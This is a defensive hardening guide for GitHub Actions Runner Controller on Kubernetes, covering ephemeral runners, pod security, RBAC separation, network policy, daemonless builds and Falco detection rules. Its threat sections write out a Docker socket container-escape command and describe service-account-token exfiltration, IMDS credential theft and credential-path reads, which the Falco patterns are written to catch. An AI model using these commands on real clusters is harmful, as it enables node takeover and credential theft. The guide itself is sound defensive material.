GitHub Actions Runner Controller Security: Ephemeral Runners and Pod Isolation in Kubernetes

The Problem

GitHub Actions Runner Controller (ARC) is a Kubernetes operator that watches the GitHub API for queued workflow jobs and provisions runner pods on demand. Each pod registers with GitHub as a self-hosted runner, receives job assignments, executes the workflow steps defined in the repository’s .github/workflows/ files, reports results back, and, in the default installation, is left running to accept the next job. That last part is the critical failure.

CI code is arbitrary. Any developer with permission to open a pull request can insert workflow steps that execute on the runner pod. Any dependency — a Node package, a Go module, a PyPI library — that is fetched and executed during the build also runs on the runner pod. When that pod lives in your Kubernetes cluster, the threat surface extends well beyond the CI pipeline:

What ARC actually creates: An AutoscalingRunnerSet instructs the ARC controller to create runner pods in a specified namespace. The controller is a Kubernetes Deployment that holds a service account with the RBAC permissions needed to create and delete pods, manage secrets, and coordinate runner registration. The runner pods it creates are regular Kubernetes pods in your cluster. They share the kernel with every other pod on the same node. They can reach any endpoint that the cluster’s network policy permits.

The persistent runner problem: By default, ARC runner pods are not ephemeral. After completing a job, the runner re-registers with GitHub and waits for the next assignment. A malicious workflow step that writes a backdoor to the runner’s filesystem, installs a cron job inside the container, or modifies the runner binary affects every subsequent job on that pod. Worse: the runner’s work directory retains artifacts from previous jobs. A workflow that reads ./_work/ may access environment variables, credentials, or code artifacts belonging to a different workflow that ran before it on the same pod.

The service account inheritance problem: The ARC controller service account requires substantial Kubernetes API access — it needs to create and delete pods, read and write secrets for GitHub registration tokens, and manage the runner lifecycle. When this service account is assigned to runner pods (which happens when the AutoscalingRunnerSet is misconfigured or uses default values), a workflow step can read /var/run/secrets/kubernetes.io/serviceaccount/token and make API calls against the Kubernetes control plane with whatever permissions the controller service account holds.

The concrete attack paths:

A developer on your team opens a PR containing a build step that reads /var/run/secrets/kubernetes.io/serviceaccount/token and sends its contents to an attacker-controlled host with a single curl call. The GitHub Actions workflow triggers on pull request. The runner pod executes this step. If the pod has a service account token mounted, the token is exfiltrated before the PR is reviewed or merged. The attacker now has a Kubernetes API token. Depending on the controller’s RBAC, this may provide pod creation, secret read access, or cluster-admin equivalent. The PR can be closed immediately; the token is already gone.

A different attack path: the ARC runner pod is configured with a mounted Docker socket for builds that require Docker. A workflow step runs docker run --privileged --pid=host --net=host -v /:/host alpine chroot /host sh — standard Docker socket escape. The workflow now has root on the Kubernetes node. From the node, it can read the kubelet’s credentials, access secrets mounted into other pods via the host filesystem at /var/lib/kubelet/pods/, and potentially pivot to the control plane.

A third path: the runner is not ephemeral. A previous job on this runner ran a deployment workflow that mounted AWS_DEPLOY_ROLE_ARN as an environment variable. The environment variable is gone — but shell history, cached AWS CLI credentials under ~/.aws/, and any artifacts written to the work directory remain. The next job, triggered by a different workflow, can read ~/.aws/credentials and exfiltrate production cloud access.

None of these require an external attacker. Any developer with PR access can execute these paths. The Kubernetes cluster running your CI pipeline is an attractive target precisely because CI pipelines routinely hold credentials to everywhere else: registries, cloud environments, secret managers, other clusters.

Threat Model

  • Node credential access via /proc: A runner pod that shares the host PID namespace (hostPID: true) or runs privileged can read /proc/<kubelet-pid>/environ. Seccomp alone does not prevent this; PID namespace isolation does. The kubelet process environment contains configuration that may include bootstrap tokens or endpoint credentials. With node-level access, enumeration of secret material mounted into other pods becomes straightforward via the host filesystem.
  • Docker socket escape: An ARC configuration that mounts the host’s /var/run/docker.sock so that workflows can run Docker commands gives any workflow step host-level access. A docker run --privileged call from within the runner escapes the pod boundary entirely.
  • Service account token abuse: Runner pods that inherit the ARC controller’s service account, or any service account with meaningful RBAC, expose Kubernetes API access to every workflow step. The token is auto-mounted at a predictable path and readable by any process in the pod.
  • Cross-job secret leakage on persistent runners: A non-ephemeral runner retains filesystem state between jobs. Cloud CLI credential caches, shell history, git credentials, and work-directory artifacts from one job are readable by subsequent jobs — potentially from different repositories or teams if the runner is shared.
  • ARC controller RBAC over-grant: The controller requires cluster-scoped RBAC to manage pods and secrets. If that RBAC is applied to runner pods instead of only to the controller, any compromised workflow can enumerate and access cluster resources at the controller’s privilege level.

Hardening Configuration

1. Ephemeral Runners: One Pod Per Job

The most important configuration is also the simplest: configure runners as ephemeral. An ephemeral runner registers with GitHub, executes exactly one job, deregisters, and terminates. The pod is deleted. The next job gets a new pod with a clean filesystem, no residual credentials, and no history from previous jobs.

ARC’s AutoscalingRunnerSet resource controls this. The minRunners: 0 and maxRunners combination allows scale-to-zero. In the configuration below, ephemeral behaviour is requested through the RUNNER_EPHEMERAL environment variable: the runner process deregisters from GitHub after the job completes, then exits, which causes the pod to reach Completed state and be garbage collected by ARC. Whether the variable is honoured depends on the runner image and ARC version, so confirm the behaviour by watching a pod finish one job and exit.

apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
  name: arc-runner-set
  namespace: arc-runners
spec:
  githubConfigUrl: "https://github.com/myorg"
  githubConfigSecret: arc-github-secret

  # Scale to zero when no jobs are queued
  minRunners: 0
  maxRunners: 10

  template:
    spec:
      containers:
      - name: runner
        image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
        env:
        - name: RUNNER_EPHEMERAL
          value: "true"
        # Explicit: runner exits after one job
        # ARC detects the completed pod and deletes it
        # Next job queued → new pod created from clean image

Pinning the runner image to a digest rather than a tag applies the same supply-chain reasoning as SHA-pinning actions: the image pulled for each pod is cryptographically fixed to a specific layer set. A new runner image release does not automatically reach your pods until you update the digest reference and redeploy.
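A quick way to catch tag-only references before they reach the cluster is to test each image string for a trailing digest. The sketch below is illustrative only: is_digest_pinned and check_images are hypothetical helper names, not part of ARC or kubectl, and the check validates the shape of the reference, not that the digest exists in the registry.

```shell
# is_digest_pinned IMAGE_REF
# Succeeds only if the reference ends in @sha256:<64 lowercase hex characters>.
is_digest_pinned() {
  printf '%s\n' "$1" | grep -Eq '@sha256:[0-9a-f]{64}$'
}

# check_images
# Reads image references from stdin, one per line. Prints every reference
# that is not digest-pinned and returns non-zero if any was found.
check_images() {
  unpinned=0
  while IFS= read -r ref; do
    [ -n "$ref" ] || continue
    if ! is_digest_pinned "$ref"; then
      printf 'NOT PINNED: %s\n' "$ref"
      unpinned=1
    fi
  done
  return "$unpinned"
}
```

One possible use, assuming kubectl access to the namespace: kubectl get pods -n arc-runners -o jsonpath='{.items[*].spec.containers[*].image}' | tr ' ' '\n' | check_images. A non-zero exit status means at least one running container was started from a mutable tag.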

The trade-off is cold-start latency. Pod scheduling, image pull (if not cached on the node), and runner registration with GitHub’s API together take 30–60 seconds. For repositories where CI jobs are infrequent or where latency is acceptable, this is the correct trade-off. For repositories with very high job throughput, pre-warming a small pool (minRunners: 2) reduces median latency, but those pre-warmed runners should still be ephemeral: they register as ephemeral runners, execute one job, and are replaced by ARC before accepting another.

2. Runner Pod Security Standards

Runner pods need to write to their workspace — readOnlyRootFilesystem: true breaks most CI use cases because workflow steps write temporary files, install tools into the runner’s PATH, and populate the work directory. Everything else should be locked down.

apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
  name: arc-runner-set
  namespace: arc-runners
spec:
  githubConfigUrl: "https://github.com/myorg"
  githubConfigSecret: arc-github-secret
  minRunners: 0
  maxRunners: 10

  template:
    metadata:
      labels:
        app: arc-runner
        # Label used by NetworkPolicy and Falco selectors
    spec:
      # No host-level namespace sharing
      hostPID: false
      hostIPC: false
      hostNetwork: false

      # Runners do not need Kubernetes API access
      automountServiceAccountToken: false

      securityContext:
        runAsNonRoot: true
        runAsUser: 1001      # The 'runner' user in the actions-runner image
        runAsGroup: 1001
        fsGroup: 1001
        seccompProfile:
          type: RuntimeDefault
        # RuntimeDefault seccomp blocks several dozen syscalls the runner never
        # needs, such as mount (used in container escape attempts), kexec_load,
        # and reboot. The exact list depends on the container runtime.

      containers:
      - name: runner
        image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
        env:
        - name: RUNNER_EPHEMERAL
          value: "true"
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: false  # Required: runner writes to /home/runner
          capabilities:
            drop: ["ALL"]
          # No capabilities added back — runner doesn't need NET_ADMIN,
          # SYS_PTRACE, SYS_ADMIN, or anything else from the default set

        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits:
            cpu: "2"
            memory: "4Gi"

        volumeMounts:
        - name: work
          mountPath: /home/runner/_work
        # No hostPath mounts
        # No Docker socket mount

      volumes:
      - name: work
        emptyDir: {}
        # emptyDir is pod-scoped: created when pod starts, deleted when pod
        # terminates. No data persists between jobs.

      # No tolerations for tainted nodes unless runners are on dedicated nodes

The automountServiceAccountToken: false line is the most operationally important field after ephemerality. It prevents the Kubernetes API token from appearing at /var/run/secrets/kubernetes.io/serviceaccount/token. A workflow step that calls curl https://kubernetes.default.svc/api/v1/secrets -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" finds no file to read, so it has no token to send: the request is rejected as unauthenticated (or fails earlier on TLS verification) instead of being accepted with a valid credential.

Apply the restricted Pod Security Standard to the arc-runners namespace:

apiVersion: v1
kind: Namespace
metadata:
  name: arc-runners
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted

The restricted PSS enforces runAsNonRoot, allowPrivilegeEscalation: false, capabilities.drop: ALL, and requires either RuntimeDefault or a named seccomp profile. ARC pods that do not meet these requirements are rejected at admission. The label applies enforcement to all pods in the namespace, not just runner pods — this also constrains any misconfigured ARC controller component that lands in the wrong namespace.
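Admission control catches violations at deploy time. A text-level check can catch the most dangerous settings earlier, for example in a pre-merge hook on the repository that holds the manifests. The following is a minimal sketch, not a YAML parser: lint_runner_manifest is a hypothetical helper that strips comments and searches for a handful of strings discussed in this article. It assumes conventional "key: value" formatting with a single space, so treat a clean result as a hint rather than proof.

```shell
# lint_runner_manifest FILE
# Prints one line per finding; returns non-zero if anything was found.
lint_runner_manifest() {
  # Drop comments so that notes such as "# No Docker socket mount" do not match.
  stripped=$(sed 's/#.*//' "$1")
  findings=0

  # Settings that should not appear in a runner pod template.
  for needle in 'docker.sock' 'hostPath:' 'hostPID: true' 'hostIPC: true' \
                'hostNetwork: true' 'privileged: true'; do
    if printf '%s\n' "$stripped" | grep -Fq "$needle"; then
      printf 'FOUND    %s\n' "$needle"
      findings=1
    fi
  done

  # Settings that should always be present.
  for needle in 'automountServiceAccountToken: false' \
                'allowPrivilegeEscalation: false' 'runAsNonRoot: true'; do
    if ! printf '%s\n' "$stripped" | grep -Fq "$needle"; then
      printf 'MISSING  %s\n' "$needle"
      findings=1
    fi
  done

  return "$findings"
}
```

Called as lint_runner_manifest runner-set.yaml (the file name is a placeholder), the function exits non-zero on any finding, so it can gate a CI job on the manifests themselves.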

3. Separate Service Accounts: Controller vs. Runner

The ARC controller service account requires meaningful Kubernetes API access. Runner pods require none. These must be separate accounts, and runner pods must explicitly reference the no-permission account.

# Controller service account — narrow RBAC, stays in arc-system namespace
apiVersion: v1
kind: ServiceAccount
metadata:
  name: arc-controller
  namespace: arc-system
---
# Runner service account — no token, no RBAC
apiVersion: v1
kind: ServiceAccount
metadata:
  name: arc-runner
  namespace: arc-runners
automountServiceAccountToken: false
---
# Minimal RBAC for the controller — only what ARC actually needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: arc-controller
  namespace: arc-runners
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "list", "watch", "create", "update", "delete"]
  # Secrets access is scoped to arc-runners namespace only
- apiGroups: ["actions.github.com"]
  resources: ["ephemeralrunners", "ephemeralrunnersets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: arc-controller
  namespace: arc-runners
subjects:
- kind: ServiceAccount
  name: arc-controller
  namespace: arc-system
roleRef:
  kind: Role
  name: arc-controller
  apiGroup: rbac.authorization.k8s.io

In the AutoscalingRunnerSet, explicitly reference the runner service account:

spec:
  template:
    spec:
      serviceAccountName: arc-runner
      automountServiceAccountToken: false
      # Both fields: serviceAccountName prevents inheriting the default SA,
      # automountServiceAccountToken: false prevents token mounting even if
      # the SA has tokens defined.

The default service account in any namespace has no RBAC, but it does have a token auto-mounted unless the namespace default is changed. Setting both fields eliminates the auto-mount regardless of namespace-level defaults.
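To see which identity a pod would hand to a workflow step, it helps to decode the payload of a mounted token. Service account tokens are JWTs, so the claims sit in the second dot-separated segment as base64url-encoded JSON. This sketch assumes a base64 binary that accepts -d (GNU coreutils or BusyBox); jwt_payload is a hypothetical helper name, and the function only decodes the claims without verifying the signature.

```shell
# jwt_payload TOKEN
# Prints the decoded JSON claims of a JWT. Does not verify the signature.
jwt_payload() {
  # The second dot-separated segment is the claims payload.
  # base64url uses '_' and '-' where standard base64 uses '/' and '+'.
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')

  # base64url omits padding; restore it so that base64 -d accepts the input.
  case $(( ${#seg} % 4 )) in
    2) seg="${seg}==" ;;
    3) seg="${seg}=" ;;
  esac

  printf '%s' "$seg" | base64 -d
}
```

Inside a pod that still has a token, jwt_payload "$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" prints the claims, including a sub field of the form system:serviceaccount:<namespace>:<name>. In a correctly configured runner pod the file does not exist and there is nothing to decode.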

4. Network Policy: Isolate Runner Pods from Internal Cluster Services

Runner pods have legitimate network needs: they must reach api.github.com to register and report job results, objects.githubusercontent.com and pipelines.actions.githubusercontent.com to download action code and receive job payloads, and any container registry your workflows pull from. They do not need to reach the Kubernetes API server, etcd, internal cluster services, or the cloud instance metadata endpoint (IMDS).

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: arc-runner-isolation
  namespace: arc-runners
spec:
  podSelector:
    matchLabels:
      app: arc-runner
  policyTypes:
  - Ingress
  - Egress

  # No ingress: runners initiate outbound connections only.
  # GitHub pushes job assignments via a long-poll from the runner process —
  # no inbound connections required.
  ingress: []

  egress:
  # DNS: required for GitHub hostname resolution
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP

  # HTTPS: GitHub API and Actions infrastructure
  # In environments with an egress proxy, restrict to the proxy IP instead
  - ports:
    - port: 443
      protocol: TCP
    to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        # Block cloud IMDS endpoints — no runner needs instance metadata
        - 169.254.169.254/32  # AWS / Azure / GCP IMDS
        - 169.254.170.2/32    # ECS task metadata
        # Block Kubernetes API server — runners don't need cluster API access
        # Replace with your actual API server CIDR
        - 10.96.0.1/32        # kubernetes.default.svc ClusterIP (typical)
        # Block internal pod CIDRs — runners shouldn't reach other pods
        - 10.244.0.0/16       # Pod CIDR (adjust to your cluster's pod CIDR)
        - 10.96.0.0/12        # Service CIDR (adjust to your cluster's service CIDR)

The IMDS block is particularly important in cloud environments. AWS, Azure, and GCP instance metadata services are reachable at link-local addresses from any pod on the node unless explicitly blocked. A workflow step that curls http://169.254.169.254/latest/meta-data/iam/security-credentials/ retrieves the node’s attached IAM role credentials without any authentication. In EKS clusters, this is how a compromised runner pod can obtain IAM credentials scoped to the node’s instance profile — potentially with permissions far beyond what the CI pipeline needs.
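The except list only helps if the addresses you care about actually fall inside it. The sketch below checks an IPv4 address against a list of CIDRs using plain shell arithmetic. ip_to_int, ip_in_cidr, and first_matching_cidr are hypothetical helper names, and the CIDR values in any call are whatever your cluster uses, not fixed constants.

```shell
# ip_to_int A.B.C.D
# Prints the IPv4 address as a 32-bit integer.
ip_to_int() {
  old_ifs=$IFS
  IFS=.
  set -- $1          # split the address into four octets
  IFS=$old_ifs
  echo $(( ($1 << 24) + ($2 << 16) + ($3 << 8) + $4 ))
}

# ip_in_cidr IP CIDR
# Succeeds if IP falls inside CIDR (for example 10.96.0.0/12).
ip_in_cidr() {
  ip=$(ip_to_int "$1")
  net=$(ip_to_int "${2%/*}")
  bits=${2#*/}
  # Build the netmask; a /0 prefix matches every address.
  if [ "$bits" -eq 0 ]; then
    mask=0
  else
    mask=$(( (4294967295 << (32 - $bits)) & 4294967295 ))
  fi
  [ $(( ip & mask )) -eq $(( net & mask )) ]
}

# first_matching_cidr IP CIDR...
# Prints the first CIDR that contains IP; fails if none does.
first_matching_cidr() {
  target=$1
  shift
  for cidr in "$@"; do
    if ip_in_cidr "$target" "$cidr"; then
      printf '%s\n' "$cidr"
      return 0
    fi
  done
  return 1
}
```

A reasonable input is the set of real API server endpoint addresses, which kubectl get endpoints kubernetes -n default -o jsonpath='{.subsets[*].addresses[*].ip}' prints. Kubernetes does not define whether NetworkPolicy is evaluated before or after Service address rewriting, so it is worth confirming that both the ClusterIP and the endpoint addresses are covered by an except entry.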

The NetworkPolicy requires a CNI plugin that enforces it: Calico, Cilium, Weave Net, or similar. The default Kubernetes networking does not enforce NetworkPolicy objects. Verify enforcement is active before relying on this control:

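# Create a short-lived test pod with the runner label and probe the API server.
# A plain TCP probe is used because an unauthenticated HTTPS request is rejected
# by the API server even when the network path is open.
# Note: with the restricted Pod Security Standard enforced on arc-runners, this
# pod also needs a compliant securityContext (for example via --overrides).
kubectl run netpol-test \
  --image=alpine --restart=Never --rm -i \
  --namespace=arc-runners \
  --labels="app=arc-runner" \
  -- sh -c "nc -z -w 5 kubernetes.default.svc 443 && echo REACHABLE || echo BLOCKED"

# Expected output with enforcement: BLOCKED (connection refused or timeout)
# Output without enforcement: REACHABLE (TCP connection succeeds)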

5. Build Container Images Without the Docker Socket

The most common justification for mounting the Docker socket into runner pods is image builds. The Docker socket mount is a host-escape vector. The alternative is daemonless image building tools that run entirely in userspace within the container.

Kaniko builds Docker images from a Dockerfile without requiring daemon access or elevated privileges:

# .github/workflows/build.yml
jobs:
  build:
    runs-on: arc-runner-set
    steps:
    - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11

    - name: Build and push with Kaniko
      run: |
        /kaniko/executor \
          --dockerfile="${GITHUB_WORKSPACE}/Dockerfile" \
          --context="dir://${GITHUB_WORKSPACE}" \
          --destination="${REGISTRY}/${IMAGE_NAME}:${GITHUB_SHA}" \
          --cache=true \
          --cache-repo="${REGISTRY}/${IMAGE_NAME}/cache"
      env:
        REGISTRY: ghcr.io/myorg
        IMAGE_NAME: myapp

For Kaniko to be available in the runner pod, either use a runner image that includes the Kaniko executor, or use ARC’s container mode where the Kaniko step runs in a sidecar container:

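# AutoscalingRunnerSet with an init container that copies the Kaniko executor
# into a shared volume. Caveat: the Kaniko project documents the executor as
# supported only inside its own image, so test this layout before relying on it.
spec:
  template:
    spec:
      initContainers:
      - name: kaniko-setup
        # The -debug variant ships busybox; the default image has no cp binary
        image: gcr.io/kaniko-project/executor:v1.21.0-debug@sha256:...
        command: ["/busybox/cp", "/kaniko/executor", "/shared/executor"]
        volumeMounts:
        - name: shared-tools
          mountPath: /shared

      containers:
      - name: runner
        # ... runner config ...
        volumeMounts:
        - name: shared-tools
          mountPath: /kaniko
          # Executor available as /kaniko/executor, the path the workflow calls.
          # A dedicated mount point avoids shadowing /usr/local/bin.

      volumes:
      - name: shared-tools
        emptyDir: {}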

Buildah is an alternative that also supports rootless operation. Both tools write to OCI-compliant registries directly, skipping the Docker daemon entirely. Neither requires --privileged, neither requires host filesystem mounts, and neither provides an escape path from the runner pod boundary.

6. Detect Suspicious Runner Activity with Falco

Runtime detection provides a second line of defence when a misconfiguration slips through or when a new attack technique bypasses preventive controls. Falco runs as a DaemonSet and monitors syscall activity from every pod on the node.

# falco-rules-arc.yaml — deploy via ConfigMap into Falco's rules directory
customRules:
  arc-runner-rules.yaml: |-

    # Runner reads host-level credential paths
    - rule: ARC runner accessing host credential paths
      desc: >
        A GitHub Actions runner pod is reading paths associated with
        node-level credentials. This may indicate an attempt to read
        kubelet credentials or other node secret material.
      condition: >
        container.label.app = "arc-runner" and
        open_read and
        (fd.name startswith "/proc/" or
         fd.name startswith "/var/lib/kubelet/" or
         fd.name startswith "/etc/kubernetes/" or
         fd.name contains "/serviceaccount/token")
      output: >
        ARC runner reading host credential path
        (pod=%k8s.pod.name ns=%k8s.ns.name path=%fd.name
         user=%user.name cmd=%proc.cmdline)
      priority: CRITICAL
      tags: [arc, runner, credential-access]

    # Runner executes kubectl — API server contact attempt
    - rule: ARC runner executing kubectl
      desc: >
        kubectl execution inside a runner pod indicates an attempt to
        interact with the Kubernetes API. Runners should have no cluster
        API access; this is anomalous in all cases.
      condition: >
        container.label.app = "arc-runner" and
        spawned_process and
        (proc.name = "kubectl" or
         proc.name = "helm" or
         proc.name = "k9s" or
         proc.name = "kustomize")
      output: >
        Kubernetes tooling executed in ARC runner pod
        (pod=%k8s.pod.name cmd=%proc.cmdline user=%user.name)
      priority: WARNING
      tags: [arc, runner, lateral-movement]

    # Runner spawns shell from non-runner parent — post-compromise persistence
    - rule: ARC runner unexpected shell spawn
      desc: >
        A shell process is spawned with an unexpected parent process inside
        a runner pod. The runner process legitimately spawns shells to execute
        workflow steps; a shell spawned from curl, wget, or python suggests
        code execution from a fetched payload.
      condition: >
        container.label.app = "arc-runner" and
        spawned_process and
        proc.name in (shell_binaries) and
        proc.pname in (curl, wget, python, python3, node, ruby) and
        not proc.pname = "Runner.Worker"
      output: >
        Unexpected shell spawn in ARC runner pod
        (pod=%k8s.pod.name shell=%proc.name parent=%proc.pname
         cmd=%proc.cmdline)
      priority: ERROR
      tags: [arc, runner, execution]

    # Runner attempts outbound connection to non-standard port
    - rule: ARC runner non-HTTPS outbound connection
      desc: >
        A runner pod is initiating a network connection on a port other
        than 443, 80, or 53. Legitimate runner activity (GitHub API, registry
        pulls, package downloads) uses HTTPS. Other outbound connections
        from runner pods warrant investigation.
      condition: >
        container.label.app = "arc-runner" and
        outbound and
        fd.sport != 443 and
        fd.sport != 53 and
        fd.sport != 80
      output: >
        ARC runner non-standard outbound connection
        (pod=%k8s.pod.name dstip=%fd.rip dstport=%fd.rport
         cmd=%proc.cmdline)
      priority: NOTICE
      tags: [arc, runner, network]

Deploy Falco in kernel module or eBPF mode. The rules above use label selectors (container.label.app = "arc-runner") to scope detection to runner pods without generating noise from other workloads. Send alerts from the credential-path and unexpected-shell rules to your incident response channel; route the WARNING and NOTICE rules to a monitoring queue for daily review.
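Falco defines a fixed set of priority levels: EMERGENCY, ALERT, CRITICAL, ERROR, WARNING, NOTICE, INFORMATIONAL, and DEBUG. A rule file that uses any other name is worth catching before deployment. The sketch below is a rough text check under stated assumptions: check_falco_priorities is a hypothetical helper, it treats INFO as an accepted short form (confirm this against your Falco version), and it only looks at lines of the form "priority: NAME".

```shell
# check_falco_priorities FILE
# Prints every priority value that is not a known Falco level and
# returns non-zero if any was found.
check_falco_priorities() {
  bad=0
  # Strip comments, then extract the word that follows each "priority:" key.
  for p in $(sed -n -e 's/#.*//' \
                    -e 's/^ *priority: *\([A-Za-z]*\).*/\1/p' "$1"); do
    # Compare case-insensitively by upper-casing the value first.
    case $(printf '%s' "$p" | tr '[:lower:]' '[:upper:]') in
      EMERGENCY|ALERT|CRITICAL|ERROR|WARNING|NOTICE|INFORMATIONAL|INFO|DEBUG) ;;
      *)
        printf 'invalid priority: %s\n' "$p"
        bad=1
        ;;
    esac
  done
  return "$bad"
}
```

Where the Falco binary is available, its own rule validation (falco -V with the rules file) is the authoritative check; a text check like this one is only a fast first pass for CI.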

Expected Behaviour

Watching the runner pod lifecycle with kubectl get pods -n arc-runners -w for an ephemeral runner set:

NAME                          READY   STATUS        RESTARTS   AGE
arc-runner-set-rg9k4-runner   0/1     Pending       0          0s
arc-runner-set-rg9k4-runner   0/1     Init:0/1      0          2s
arc-runner-set-rg9k4-runner   1/1     Running       0          8s
# Job executes for ~45 seconds
arc-runner-set-rg9k4-runner   0/1     Completed     0          53s
arc-runner-set-rg9k4-runner   0/1     Terminating   0          54s
# Pod deleted; next job queued → new pod with new name
arc-runner-set-rg9k5-runner   0/1     Pending       0          0s

Each pod name includes a random suffix: rg9k4, rg9k5. Each starts from a clean copy of the runner image. The emptyDir volume that held the previous job’s workspace is gone with the pod.
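One way to confirm this from inside a job is to have the first workflow step look for files that only a previous job could have left behind. This is a rough sketch: find_residue is a hypothetical helper, and the path list combines the credential locations named earlier in this article with a few other common ones. It is illustrative, not exhaustive.

```shell
# find_residue HOME_DIR
# Prints every leftover credential or history file found under HOME_DIR
# and returns non-zero if any exists.
find_residue() {
  home_dir=$1
  found=0
  for rel in .aws/credentials .docker/config.json .git-credentials \
             .kube/config .bash_history; do
    if [ -e "$home_dir/$rel" ]; then
      printf 'residue: %s\n' "$home_dir/$rel"
      found=1
    fi
  done
  return "$found"
}
```

Running find_residue "$HOME" || exit 1 as the first step of a job fails fast if the runner is not as fresh as expected. On an ephemeral runner it should print nothing.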

A workflow step that attempts to reach the Kubernetes API server from a runner pod with the network policy applied:

# Inside a workflow step:
curl -sk https://kubernetes.default.svc/api/v1/namespaces \
  -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo 'no-token')"

# Result with automountServiceAccountToken: false and NetworkPolicy enforced:
# cat: /run/secrets/kubernetes.io/serviceaccount/token: No such file or directory
# curl: (28) connection timed out (DNS still resolves because port 53 is allowed)
# (or (7) connection refused, depending on CNI implementation)

A workflow step that runs cat /proc/1/environ triggers the Falco rule ARC runner accessing host credential paths within milliseconds. The alert appears in your SIEM or alerting channel. The workflow step itself still completes: Falco detects, it does not block. For enforcement, pair it with a response component that acts on Falco alerts (for example, one that deletes the offending pod), or with Tetragon, which can terminate the process directly.

Trade-offs

Ephemeral runner cold-start latency: Pod scheduling, image pull, and GitHub runner registration together take 30–60 seconds on a warm node with a cached image. For repositories where jobs queue frequently, this latency is the primary operational complaint. Mitigations: pre-pull the runner image via a DaemonSet on dedicated runner nodes, use minRunners: 2 for a standing pool of ephemeral runners (they each register and wait for exactly one job before terminating), and place runner nodes in the same availability zone as the scheduler. The latency is a fixed cost. The alternative, persistent runners, trades 45 seconds of startup time for the entire attack surface described above.

No Docker socket, no easy Docker builds: Some CI workflows have hard dependencies on Docker daemon features: multi-platform builds via docker buildx, BuildKit cache mounts, or legacy docker-compose test setups. Kaniko covers the common case (Dockerfile to registry) but does not support all BuildKit features. Buildah covers more of the OCI build surface. For multi-platform builds, Kaniko supports --custom-platform; for cache mounts, the runner pod can be configured with a persistent volume claim for the Kaniko layer cache rather than using BuildKit’s cache mount syntax. The migration cost is real but bounded — most CI image builds reduce to FROM, COPY, RUN, CMD and work unchanged with Kaniko.

readOnlyRootFilesystem: false: Most container security guidance recommends readOnlyRootFilesystem: true. Runner pods cannot function with this set — workflow steps install tools, write temporary files, and populate the work directory under /home/runner/. This is a legitimate exception driven by the runner’s operational requirements. The compensating controls are: runAsNonRoot: true (the runner user cannot write to paths owned by root), capabilities: drop: ALL (the runner user cannot escalate or change file ownership), and the emptyDir workspace that is destroyed with the pod.

NetworkPolicy except blocks are fragile: The ipBlock.except syntax requires knowing your API server’s ClusterIP, pod CIDR, and service CIDR. These values differ between clusters and may change if the cluster is rebuilt. A more robust approach for clusters with Cilium: use CiliumNetworkPolicy with toFQDNs rules that explicitly name the allowed GitHub endpoints rather than using IP block exceptions. This is more maintainable and more precise, but introduces a Cilium dependency.

Failure Modes

Persistent runners left as the default: The ARC Helm chart defaults and quick-start documentation focus on getting runners working, not on making them ephemeral. Teams that deploy ARC from the default chart without setting RUNNER_EPHEMERAL: "true" run persistent runners indefinitely. A malicious workflow step that writes to ~/.bashrc, installs a cron job inside the container, or modifies /home/runner/run.sh persists across jobs until the pod is manually deleted or the node is recycled. Ephemeral runners should be treated as a deployment prerequisite, not an optional optimisation.

Inheriting the controller service account: If the AutoscalingRunnerSet does not specify serviceAccountName: arc-runner in its pod template, Kubernetes assigns the default service account of the arc-runners namespace. If the arc-system namespace and arc-runners namespace are the same (a common shortcut in quick-start deployments), the runner pods may inherit the controller’s service account. The controller’s service account has permission to create pods, read secrets, and manage runners — exactly the permissions a compromised runner needs to escalate within the cluster. Verify: kubectl get pods -n arc-runners -o jsonpath='{.items[*].spec.serviceAccountName}' should return arc-runner (the restricted account), not arc-controller or default.
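The jsonpath query above prints a space-separated list, which is easy to misread when many pods are running. A small wrapper can turn it into a pass-or-fail check. This is a sketch: check_runner_service_accounts is a hypothetical helper, and it treats an empty list as a failure because no pods means nothing was verified.

```shell
# check_runner_service_accounts EXPECTED
# Reads whitespace-separated service account names from stdin.
# Returns 0 if every name equals EXPECTED, 1 if any differs,
# and 2 if the list is empty.
check_runner_service_accounts() {
  expected=$1
  count=0
  bad=0
  for sa in $(cat); do
    count=$((count + 1))
    if [ "$sa" != "$expected" ]; then
      printf 'unexpected service account: %s\n' "$sa"
      bad=1
    fi
  done
  if [ "$count" -eq 0 ]; then
    printf 'no runner pods found; nothing verified\n'
    return 2
  fi
  return "$bad"
}
```

Piping the query into it, as in kubectl get pods -n arc-runners -o jsonpath='{.items[*].spec.serviceAccountName}' | check_runner_service_accounts arc-runner, gives an exit status that a scheduled audit job can act on.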

